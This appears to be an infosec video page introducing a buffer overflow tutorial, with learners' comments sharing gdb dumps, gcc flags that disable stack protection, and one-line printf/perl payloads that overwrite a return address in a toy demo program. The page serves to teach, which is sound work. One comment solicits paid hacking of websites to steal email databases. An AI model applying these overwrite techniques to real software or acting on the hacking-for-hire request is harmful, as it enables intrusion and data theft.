Description: In this video series we will learn the basics of Buffer Overflow attacks and demonstrate how one can exploit Buffer Overflows in programs for fun and profit. The pre-requisite for this video series is that you are familiar with Assembly language. If you are not familiar with Assembly language, no worries, I have created detailed video tutorials for Assembly language here - Assembly Language Primer for Hackers.
In Part 1 of the Buffer Overflow series we will look at why buffer overflow attacks happen. We will discuss how the program stack is laid out when a function call happens, then how a buffer can be overwritten if proper bounds checking does not happen and finally how a hacker could take control of the program by overwriting the return address stored on the stack to an arbitrary value. We will use a sample program - Demo.c to demonstrate how it is possible to change the Return address by overwriting the stack using user supplied input.
Tags: programming ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
For anyone who is trying to make these examples work, make sure that when you compile, you include the following option -fno-stack-protector so gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -o demo demo.c
firstly thank you for the assam example-videos.
i try this examples, but it doesn't work. my compiler said that: 'demo.c:1: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘<’ token' with -fno-stack-protector to me, but why? i don't know.
Did you had to write them in reverse order because there is a last in first out rule?
yes, that was my own mistake. thank you for your fast help. i found that error on the same day. but i have an another question. my esp show me 0x14 and not 0x8. what should i do in this case?
its a amazing video
[quote]c-b51: yes, that was my own mistake. thank you for your fast help. i found that error on the same day. but i have an another question. my esp show me 0x14 and not 0x8. what should i do in this case?[/quote]
Your memory map may not match up exactly with the one in this video therefor your address may be different, Mine are as well. The important thing is to understand which address is chosen and why. For example: the first address in CanNeverExecute() on my system is 0x080483e4, whereas the address in the video is 0x080483b4. So this is the address I will use for the printf call because it points to the first instruction in that function.
So just make sure that you are copying the same relative address as in the video and don't worry about whether the numbers match exactly. I highly suggest working through the assembly programing tutorials if you have not already, very enlightening.
[quote]H4TT1fN4TT: Did you had to write them in reverse order because there is a last in first out rule?[\quote]
This is exactly correct. The stack is stored in order from highest memory to lowest memory, however the program will read it from lowest to highest when it accesses the values stored there. So when we stack: /xb4 /x83 /x04 /x08 the /xb4 will be in the high mem and /x08 will be in the lower mem and the program will pop them off the stack in correct order by starting with the lowest byte and working to the highest.
This is also explained in the Assembly Primer. Check it out! You gotta work through the basics in order to understand the advanced. Its much worth the couple of hours you put in to it.
First off, awesome vid once again! Thanks for the information :)
Secondly I wanted to mention that perl can be a real help here. While printf command does get the job done, perl is a bit more flexible that can potentially save you a lot of typing:
perl -e 'printf "A" x 12 . "\x24\x84\x04\x08"' | ./demo
In this case I am telling perl to print A 12 times then concatenating the memory address for the CanNeverExecute() function on the end.
Just so helpful, quite a complex topic to cover and you do it so well. Keep up the good work!
it so good but i have a question
Dump of assembler code for function CanNaverExecute:
0x08048414 <+0>: push %ebp
0x08048415 <+1>: mov %esp,%ebp
and i try to write hex value at return address but
printf "aaaabbbbcccc\x14\x84\x04\x08" |./demo
aaaabbbbcccc?
Segmentation fault
just print hex to char ... how can i write hex value ?
plz help me
nice videos
Nice presentation. ru from chennai.. Mr.ramchandhran
Excellent presentation evident of a lot of thought and work. Interesting that the gdb step function follows the lines of the program (language) that is actually executed.
......Is there a way to step thru the assembly language created by the C program?
Excellent presentation. I really appreciate your efforts. thanks.
Thank sailboat for your comment.
excellent mr.ramchandhran..
thank you so much.Actually for a long time I was spending many time for understanding buffer overflow.Moreover I found many books about that.But your video was perfect and clear.
i am glad i found this video. thanks and looking forward to see the exploitation part.
thank u! vivek!!!! :) greetings from mexico
I watched your assembly primer and found it really helpful, but this video is where the really cool stuff happens! I finally registered just to comment on this video. The memory addresses were a bit different so I had to work some of it out on my own, but I got it working and feel like I really understand it. Thank you and keep up the great work!
Which Linux version shoul I use to test it and where to download, please? I always get the message from some security solution :(
Great work Vivek..it all goes down nice and clear now.....Keep it up..we need more guys like u!!
I tried to run the demo in gdb but instead of reserving 8 bytes, cpu go ahead to do `sup $10, %esp`. I can't figure out why the reservation of space is double (from 8 to 16 byte). Does anyone got the similar problem? I understand the memory map may not be the same (coz address randomizer at start), but the amount of memory reserved should be fixed by 8 (because we did "char buffer[8]")??
Dump of assembler code for function main:
0x080484ae <+0>: push %ebp
0x080484af <+1>: mov %esp,%ebp
=> 0x080484b1 <+3>: call 0x8048474 <GetInput>
0x080484b6 <+8>: mov $0x0,%eax
0x080484bb <+13>: pop %ebp
0x080484bc <+14>: ret
End of assembler dump.
(gdb) disas GetInput
Dump of assembler code for function GetInput:
0x08048474 <+0>: push %ebp
0x08048475 <+1>: mov %esp,%ebp
0x08048477 <+3>: sub $0x10,%esp
0x0804847a <+6>: mov %gs:0x14,%eax
0x08048480 <+12>: mov %eax,-0x4(%ebp)
0x08048483 <+15>: xor %eax,%eax
0x08048485 <+17>: lea -0xc(%ebp),%eax
0x08048488 <+20>: mov %eax,(%esp)
0x0804848b <+23>: call 0x8048374 <gets@plt>
0x08048490 <+28>: lea -0xc(%ebp),%eax
0x08048493 <+31>: mov %eax,(%esp)
0x08048496 <+34>: call 0x80483a4 <puts@plt>
0x0804849b <+39>: mov -0x4(%ebp),%edx
0x0804849e <+42>: xor %gs:0x14,%edx
0x080484a5 <+49>: je 0x80484ac <GetInput+56>
0x080484a7 <+51>: call 0x8048394 <__stack_chk_fail@plt>
0x080484ac <+56>: leave
0x080484ad <+57>: ret
hey man, i want to thank you for taking the time to do all this videos. good damn work, please keep it up man you r doing fantastic... :)
thank you! from south korea!!
Loved it...thanks ! -as ever...you smooth as silk !
I always been looking for some good explanation about the exploits until i found this.
Thanks alot dude
I need someone who is capable of hacking* websites & accessing their email database
I don't need scraping,web crawling or extractors
I need this sites HACKED so I gain access to their email DB
I will need to test the result u give me,if it checks out,I am willing to pay up to 3000$
per website and 10-20 websites monthly,which will increase upon delivery of faster & quality
service
Pls note,CONTINUITY is what I am after...I NEED A GOOD PARTNER I CAN WORK WITH FOR A VERY
LONG TIME!. I HAVE AT LEAST 500 WEBSITES ON MY LIST AND IM WILLING TO PAY 3000$ PER WEBSITE
PLEASE SEND ME A MAIL IF U CAN DO THIS ASAP ; omorye007 (at) yahoo (dot) com
Cheers
Thank you for the great video!!
I got a question:
everything worked fine but to overwrite the return value
i got to write this:
printf "123456789ab\x00\x34\x84\x04\x08"
because if i try to use ur code printf "123456789abc\x08\x34\x84\x04\x08" idk
it works but i get some stuff at end of the reputting like �
Also my return value apear after 16 bytes not like urs after 12 bytes. But everything works great if i overwrite the 12 bytes like u did. i dont get it :/ help me guys
0xbffff2c4: 0x00163c55 0x08048489 0x002aaff4 0xbffff2d8
0xbffff2d4: 0x08048478 <------return value 0x00000000 0x0014a113 0x00000001
excellent video........:)
Thank you for wonderful videos Vivek, this also works nicely for 64bit :D
Very well explained, could i get more information on the machine setup you have in the video? software, OS etc..
Awesome video. very thorough.
Hi guys, could somebody help me please ? In the assembly megaprimer i've successfully ported all the programs to x64 ( i'm working on a x64 Backtrack R2 ) but i can't make this vulnerability work on my x64 system , and i just can't figure out why , i've tried to search after tutorials on overflowing x64 programs but i haven't found one yet
Here is my stack right before taking input
0x7fffffffe3d0: 0x00000000 0x00000000 0x004004d0 0x00000000
0x7fffffffe3e0: 0xffffe3f0 0x00007fff 0x004005fc 0x00000000
the return address is:0x004005fc
Disas Main:
0x00000000004005ef <+1>: mov %rsp,%rbp
0x00000000004005f2 <+4>: mov $0x0,%eax
0x00000000004005f7 <+9>: callq 0x4005cc <GetInput>
0x00000000004005fc <+14>: mov $0x0,%eax
Disas CanNeverExecute:
0x00000000004005b4 <+0>: push %rbp
0x00000000004005b5 <+1>: mov %rsp,%rbp
0x00000000004005b8 <+4>: mov $0x4006fc,%eax
My Input Is : prinf "AAAABBBBAAAABBBB\xb4\x05\x40\x00" | ./VulnApp
I've tried playing with the input length and to feed the whole 8bytes like
prinf "AAAABBBBAAAA\xb4\x05\x40\x00\x00\x00\x00\x00"
what should i do ? please explain , aslr is of course turned off
thanks :)
hello sir,
Is that reversing of hex values is due to little endian
@stock: I had the same problem, it looks like some versions of gcc have a stack smashing detection module, so, it can be disabled adding -fno-stack-protector parameter to the compilation.
Wilson,
I was just able to do it on BT5R2 64-bit:
printf "aaaaaaaaaaaaaaaaaaaa\xff\x7f\x00\x00\xb4\x05\x40\x00" |./demo
My stack usuing x/16xw $rsp
0x7fffffffe3b0: 0x00000000 0x00000000 0x004004d0 0x00000000
0x7fffffffe3c0: 0xffffe3d0 0x00007fff 0x004005fc 0x00000000
0x004005fc is my return address that I needed to ovewrite to end in b4 for that function. The problem is, it looks like you neeed the word before it too, starting with 0x00007fff for the full addres, I think because of 64-bit length (i'm a beginner, so I can only theorize). So I do 5x4 A's to overwrite the first 5 words, then hex ff 7f 00 00 (backwards because of little Endian I think), then b4 (the key part) and 05 40 00 . This ends up redirecting it and the function shows up.
Thanks for making the buffer overflow concept clear.
i am stuck with a problem...
for the code
#include<stdio.h>
main()
{
int a =10;
printf("%d,%d,%d",a,++a,++a);
}
can you explain the output of the code (12,12,12) in terms of STACK operations ?
I falied to understand it ..i tried to disassemble the code with gdb ..still didn't help.
Thanks in advance
Thanks :D great vid!
please help me with this.
i am typing this printf "123456789abc\x14\x84\x04\x08" | ./Demo , the CanNeverExecute Function is not executing its showing this 123456789abc�
also the Return address is showing after 16 byte :/
(gdb) disassemble CanNeverExecute
Dump of assembler code for function CanNeverExecute:
0x08048414 <+0>: push %ebp
0x08048415 <+1>: mov %esp,%ebp
0x08048417 <+3>: sub $0x4,%esp
0x0804841a <+6>: mov $0x8048520,%eax
0x0804841f <+11>: mov %eax,(%esp)
0x08048422 <+14>: call 0x8048340 <printf@plt>
0x08048427 <+19>: leave
0x08048428 <+20>: ret
-----
19 GetInput();
(gdb) x/8xw $esp
0xbffff758: 0xbffff7d8 0x00145ce7 0x00000001 0xbffff804
0xbffff768: 0xbffff80c 0xb7fff848 0xbffff860 0xffffffff
(gdb) s
Breakpoint 2, GetInput () at Demo.c:13
13 gets(buffer);
(gdb) x/8xw $esp
0xbffff744: 0x0011eb80 0x0804847b 0x00288ff4 0xbffff758
0xbffff754: 0x0804844f 0xbffff7d8 0x00145ce7 0x00000001
(gdb) disassemble 0x0804844f
Dump of assembler code for function main:
0x08048447 <+0>: push %ebp
0x08048448 <+1>: mov %esp,%ebp
0x0804844a <+3>: call 0x8048429 <getinput>
0x0804844f <+8>: mov $0x0,%eax
0x08048454 <+13>: pop %ebp
0x08048455 <+14>: ret
End of assembler dump.
(gdb) disassemble 0xbffff7d8
No function contains specified address.
0x0804844f is the return address
amazing...u r the best...vivek
great stuff, hard and detailed concepts well explained. Save a tons of time to those who are trying to understand debugging and exploiting native application
Another great series! The assembly language series makes this easier to understand.
This was so helpful! thank you so much i plan on watching the rest of these videos.
Thanks Vivek, I personally feel u take-up any topic and present in simplest manner possible.
Awesome presentation skills, No words for your great (selfless) works :)
Thanks Again.
Thanks, awesome!
This was very helpful.
I assume that you inputed the hex values in reverse order because the machine you are operating on is little endian, am I correct?
a Linux/x86 machine perhaps?
Head to http://www.securitytubeforums.net/ to ask questions and find answers about this megaprimer
Vivek,
Thank you for this video, you have really helped me understand how to find and change the return address.
Keep up the good work!
First of all, Very well explained such a complex topic
But i am getting an error in doing so.
By using this command,
printf "123456789abc\x74\x84\x04\x08" | ./smash
I am getting the error & it does not print the contents of canneverexecute() function
The error is :
123456789abct�
*** stack smashing detected ***: ./smash terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7f562d0]
/lib/tls/i686/cmov/libc.so.6(+0xe227a)[0xb7f5627a]
./smash[0x80484c0]
./smash[0x8048400]
======= Memory map: ========
08048000-08049000 r-xp 00000000 00:0f 161356 /cow/root/Desktop/smash
08049000-0804a000 r--p 00000000 00:0f 161356 /cow/root/Desktop/smash
0804a000-0804b000 rw-p 00001000 00:0f 161356 /cow/root/Desktop/smash
0804b000-0806c000 rw-p 00000000 00:00 0 [heap]
b7e41000-b7e5e000 r-xp 00000000 07:00 291348 /rofs/lib/libgcc_s.so.1
b7e5e000-b7e5f000 r--p 0001c000 07:00 291348 /rofs/lib/libgcc_s.so.1
b7e5f000-b7e60000 rw-p 0001d000 07:00 291348 /rofs/lib/libgcc_s.so.1
b7e73000-b7e74000 rw-p 00000000 00:00 0
b7e74000-b7fc7000 r-xp 00000000 07:00 287793 /rofs/lib/tls/i686/cmov/libc-2.11.1.so
b7fc7000-b7fc9000 r--p 00153000 07:00 287793 /rofs/lib/tls/i686/cmov/libc-2.11.1.so
b7fc9000-b7fca000 rw-p 00155000 07:00 287793 /rofs/lib/tls/i686/cmov/libc-2.11.1.so
b7fca000-b7fcd000 rw-p 00000000 00:00 0
b7fde000-b7fe2000 rw-p 00000000 00:00 0
b7fe2000-b7fe3000 r-xp 00000000 00:00 0 [vdso]
b7fe3000-b7ffe000 r-xp 00000000 07:00 291960 /rofs/lib/ld-2.11.1.so
b7ffe000-b7fff000 r--p 0001a000 07:00 291960 /rofs/lib/ld-2.11.1.so
b7fff000-b8000000 rw-p 0001b000 07:00 291960 /rofs/lib/ld-2.11.1.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
Aborted (core dumped)
Why it is not working for me ?
My system info is :
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
Thanks
Now I know what Stack Overflow Attack is!!! Thanks Vivek.. God bless you
@Silent: You have to use the address specific to your system (execution environment). Mine does not work either.. I guess it is because I run Ubuntu 64bit version. My registers RAX, RBX, RSP instead of EAX and so on.
Great Explanation... Important thing is Explaining such a difficult thing in an easy way.... Nice way of explaining...
Great Explanation... Important thing is Explaining such a difficult thing in an easy way.... Nice way of explaining...
Just awesome!
when i try to overwrite EIP on backtrack 5
I get this msg
stack smashing detected
Thanks dude, was awesome. Explained a lot of things which I wasn't sure about and this was the best information tutorial I have seen!
vivek u r very good teacher , ur videos r really awsme starting frm basics and covering every minor detail of topic and showing its practical implentation ur approach is excellent.
I salute u for ur work and for sharing these videos and information. Keep it up..:)
Awesome video series! Thanks for uploading this.
It worked for me running on 64 bit arch.
Note that we reserve 24 bytes before the return address.
help me guys ,when i tried to run gcc -ggdb -mpreferred-stack-boundary=2 -o demo demo.c
it gives me error "demo.c:1:0: error: -mpreferred-stack-boundary=2 is not between 4 and 12
"
strongly appreciated if someone help....
my compiler taking minimum stack boundary=4 , how to get it done with stack boundary=2